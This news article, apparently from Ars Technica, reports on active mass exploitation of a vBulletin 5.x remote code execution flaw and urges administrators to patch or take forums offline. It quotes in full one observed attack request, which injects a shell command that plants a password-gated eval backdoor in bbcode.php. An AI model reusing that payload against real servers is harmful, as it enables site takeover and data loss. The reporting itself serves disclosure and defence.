High-severity vulnerability in vBulletin is being actively exploited
Attackers are mass-exploiting an anonymously disclosed vulnerability that makes it possible to take control of servers running vBulletin, one of the Internet’s most popular applications for website comments. Sites running the app should take comments offline until administrators install a patch that vBulletin developers released late Wednesday morning.
The vulnerability was disclosed through an 18-line exploit that was published on Monday by an unidentified person. The exploit allows unauthenticated attackers to remotely execute malicious code on just about any vBulletin server running versions 5.0.0 up to 5.5.4. The vulnerability is so severe and easy to exploit that some critics have described it as a back door.
“Essentially, any attack exploits a super simple command injection,” Ryan Seguin, a research engineer at Tenable, told Ars. “An attacker sends the payload, vBulletin then runs the command, and it responds back to the attacker with whatever they asked for. If an attacker issues a shell command as part of the injection, vBulletin will run Linux commands on its host with whatever user permissions vBulletins’ system-level user account has access to.” Seguin has more in this technical analysis of the vulnerability.
According to researcher Troy Mursch of the Bad Packets security intelligence service, attackers are using botnets to actively exploit vulnerable servers. Some of the Web requests they send look like this:
"widgetConfig[code]=echo shell_exec('sed -i \'s/eval(\$code);/if (isset(\$_REQUEST[\"epass\"]) \&\& \$_REQUEST[\"epass\"] == \"2dmfrb28nu3c6s9j\") { eval(\$code); }/g\' includes/vb5/frontend/controller/bbcode.php && echo -n exploited | md5sum'); exit;"
Some of the infected computers carrying out the attacks have been spotted in the past using the EternalBlue exploit, developed by and later stolen from the National Security Agency, to compromise computers that have yet to install a patch Microsoft released in early 2017.
Some vBulletin users took to the software’s official support pages on Wednesday to report they had been hacked. “I received an email today from my hosting provider stating that ‘malicious code was detected on your website and a huge number of email spam messages originating from it,’” one user wrote here (free account required). Another user reported having an entire MySQL database deleted.
vBulletin is among the most widely used website commenting systems and is probably used on tens of thousands—possibly hundreds of thousands—of sites. Fortunately, version 5x makes up less than 7% of active installations, according to W3techs, a site that surveys the software used across the Internet. Still, Internet searches like this one suggest that 10,000 or more sites may be running vulnerable versions.
Exploit available for years
According to Chaouki Bekrar, founder and CEO of the Zerodium exploit broker, the vulnerability has been privately circulating for years.
The recent vBulletin pre-auth RCE 0day disclosed by a researcher on full-disclosure looks like a bugdoor, a perfect candidate for @PwnieAwards 2020. Easy to spot and exploit.
Many researchers were selling this exploit for years. @Zerodium customers were aware of it since 3 years
— Chaouki Bekrar (@cBekrar) September 25, 2019
“Many researchers were selling this exploit for years,” he wrote on Twitter. “Zerodium customers were aware of it since 3 years.”
The availability of a working exploit is aggravated by another publicly posted script that uses the Shodan search site to find vulnerable servers. Attackers can use it to generate a list of vBulletin sites that are susceptible and then use the exploit to take them over.
The vulnerability exists in default installations of the affected versions. According to Tenable’s publicly posted analysis, “an unauthenticated attacker can send a specially crafted HTTP POST request to a vulnerable vBulletin host and execute commands. These commands would be executed with the permissions of the user account that the vBulletin service is utilizing. Depending on the service user’s permissions, this could allow complete control of a host.”
As advised earlier, the vulnerability is so severe that vulnerable vBulletin users should take their forums offline until they have installed a patch developers published on Wednesday morning. The commenting system for Defcon.org, a site that’s regularly probed for easy-to-hack vulnerabilities, was non-operational at the time this post went live. This Internet cache shows the site used a vulnerable version as recently as Tuesday. The shutdown likely means that site admins heeded the advice to take comments offline until the vulnerability is fixed.
Before a patch was available, people reported that they were able to successfully mitigate the vulnerability by following the instructions here. Now that a patch is available, affected vBulletin users should install it at once.
